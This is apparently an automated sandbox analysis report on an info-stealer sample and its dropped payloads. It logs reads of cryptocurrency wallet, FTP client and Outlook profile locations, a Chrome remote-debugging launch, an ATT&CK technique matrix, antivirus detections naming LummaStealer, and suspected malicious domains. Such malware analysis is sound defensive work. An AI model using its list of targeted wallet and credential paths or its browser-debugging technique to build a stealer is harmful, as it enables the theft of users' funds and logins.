                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeKey opened: Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeKey opened: Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeKey opened: Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeKey opened: Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeDirectory queried: number of queries: 1001
                                    Source: Yara matchFile source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: Process Memory Space: EdYEXasNiR.exe PID: 6464, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: DX0TGIT2LZWIIEDZ8Y3A15R.exe PID: 2656, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 64252d274d.exe PID: 7584, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 696689ce6d.exe PID: 1072, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: jyidkjkfhjawd.exe PID: 7064, type: MEMORYSTR

                                    Remote Access Functionality

                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                    Source: Yara matchFile source: Process Memory Space: 64252d274d.exe PID: 7584, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 696689ce6d.exe PID: 1072, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: EdYEXasNiR.exe PID: 6464, type: MEMORYSTR
                                    Source: Yara matchFile source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000003.00000002.2212351037.0000000000EF1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000003.00000002.2211683173.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: DX0TGIT2LZWIIEDZ8Y3A15R.exe PID: 2656, type: MEMORYSTR
                                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C540C40 sqlite3_bind_zeroblob,3_2_6C540C40
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C540D60 sqlite3_bind_parameter_name,3_2_6C540D60
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C468EA0 sqlite3_clear_bindings,3_2_6C468EA0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C540B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,3_2_6C540B40
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C466410 bind,WSAGetLastError,3_2_6C466410
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C46C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,3_2_6C46C050
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C466070 PR_Listen,3_2_6C466070
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C46C030 sqlite3_bind_parameter_count,3_2_6C46C030
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4660B0 listen,WSAGetLastError,3_2_6C4660B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C3F22D0 sqlite3_bind_blob,3_2_6C3F22D0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4663C0 PR_Bind,3_2_6C4663C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C469400 sqlite3_bind_int64,3_2_6C469400
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4694C0 sqlite3_bind_text,3_2_6C4694C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4694F0 sqlite3_bind_text16,3_2_6C4694F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C469480 sqlite3_bind_null,3_2_6C469480
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4692E0 sqlite3_bind_double,3_2_6C4692E0
                                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts | 121 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                                    Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 Extra Window Memory Injection | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 23 File and Directory Discovery | Remote Desktop Protocol | 41 Data from Local System | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                                    Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 11 Scheduled Task/Job | 112 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 2410 System Information Discovery | SMB/Windows Admin Shares | 11 Email Collection | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                                    Employee Names | Virtual Private Server | Local Accounts | 2 Command and Scripting Interpreter | 111 Registry Run Keys / Startup Folder | 11 Scheduled Task/Job | 12 Software Packing | NTDS | 11 Query Registry | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
                                    Gather Victim Network Information | Server | Cloud Accounts | 11 Scheduled Task/Job | Network Logon Script | 111 Registry Run Keys / Startup Folder | 1 Timestomp | LSA Secrets | 1171 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                                    Domain Properties | Botnet | Replication Through Removable Media | 3 PowerShell | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Extra Window Memory Injection | DCSync | 561 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Masquerading | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 561 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 112 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                                    [Behavior graph: ID 1582828, Sample: EdYEXasNiR.exe, Startdate: 31/12/2024, Architecture: WINDOWS, Score: 100]

                                    Source | Detection | Scanner | Label | Link
                                    EdYEXasNiR.exe | 57% | Virustotal | | Browse
                                    EdYEXasNiR.exe | 100% | Avira | TR/Crypt.XPACK.Gen
                                    EdYEXasNiR.exe | 100% | Joe Sandbox ML

                                    Source | Detection | Scanner | Label | Link
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe | 100% | Avira | TR/ATRAPS.Gen
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exe | 100% | Avira | TR/Crypt.TPM.Gen
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe | 100% | Avira | TR/Crypt.TPM.Gen
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exe | 100% | Avira | HEUR/AGEN.1320706
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe | 100% | Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exe | 100% | Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe | 100% | Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe | 100% | Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exe | 100% | Joe Sandbox ML
                                    C:\ProgramData\freebl3.dll | 0% | ReversingLabs
                                    C:\ProgramData\mozglue.dll | 0% | ReversingLabs
                                    C:\ProgramData\msvcp140.dll | 0% | ReversingLabs
                                    C:\ProgramData\nss3.dll | 0% | ReversingLabs
                                    C:\ProgramData\softokn3.dll | 0% | ReversingLabs
                                    C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\freebl3[1].dll | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\mozglue[1].dll | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\msvcp140[1].dll | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\nss3[1].dll | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe | 57% | ReversingLabs | Win32.Trojan.Pantera
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\softokn3[1].dll | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcruntime140[1].dll | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\eO7MwvK[1].exe | 8% | ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exe | 8% | ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[3].exe | 8% | ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[1].exe | 95% | ReversingLabs | Win32.Trojan.LummaStealer
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exe | 9% | ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exe | 30% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exe | 48% | ReversingLabs | Win32.Trojan.Generic
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[5].exe | 96% | ReversingLabs | Win32.Trojan.LummaC
                                    C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe | 57% | ReversingLabs | Win32.Trojan.Pantera
                                    C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe | 30% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
                                    C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe | 95% | ReversingLabs | Win32.Trojan.LummaStealer
                                    C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe | 48% | ReversingLabs | Win32.Trojan.Generic
                                    C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe | 9% | ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe | 8% | ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\1027574001\eO7MwvK.exe | 8% | ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exe | 96% | ReversingLabs | Win32.Trojan.LummaC
                                    C:\Users\user\AppData\Local\Temp\1027578001\4c4716526e.exe | 8% | ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exe | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\msvcp140.dll | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ucrtbase.dll | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_ctypes.pyd | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pyd | 0% | ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pyd | 0% | ReversingLabs
                                    No Antivirus matches
                                    No Antivirus matches
                                    No contacted domains info
                                    Name | Malicious | Antivirus Detection | Reputation
                                    fancywaxxers.shop | false | | high
                                    rabidcowse.shop | false | | high
                                    nearycrepso.shop | false | | high

                                    Name | Source | Malicious | Antivirus Detection | Reputation
                                                                              high
                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://rapeflowwj.lat/f696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://steamcommunity.com/profiles/76561199724331900696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000035.00000002.2538930366.0000017329A9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000035.00000002.2538930366.0000017329A9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
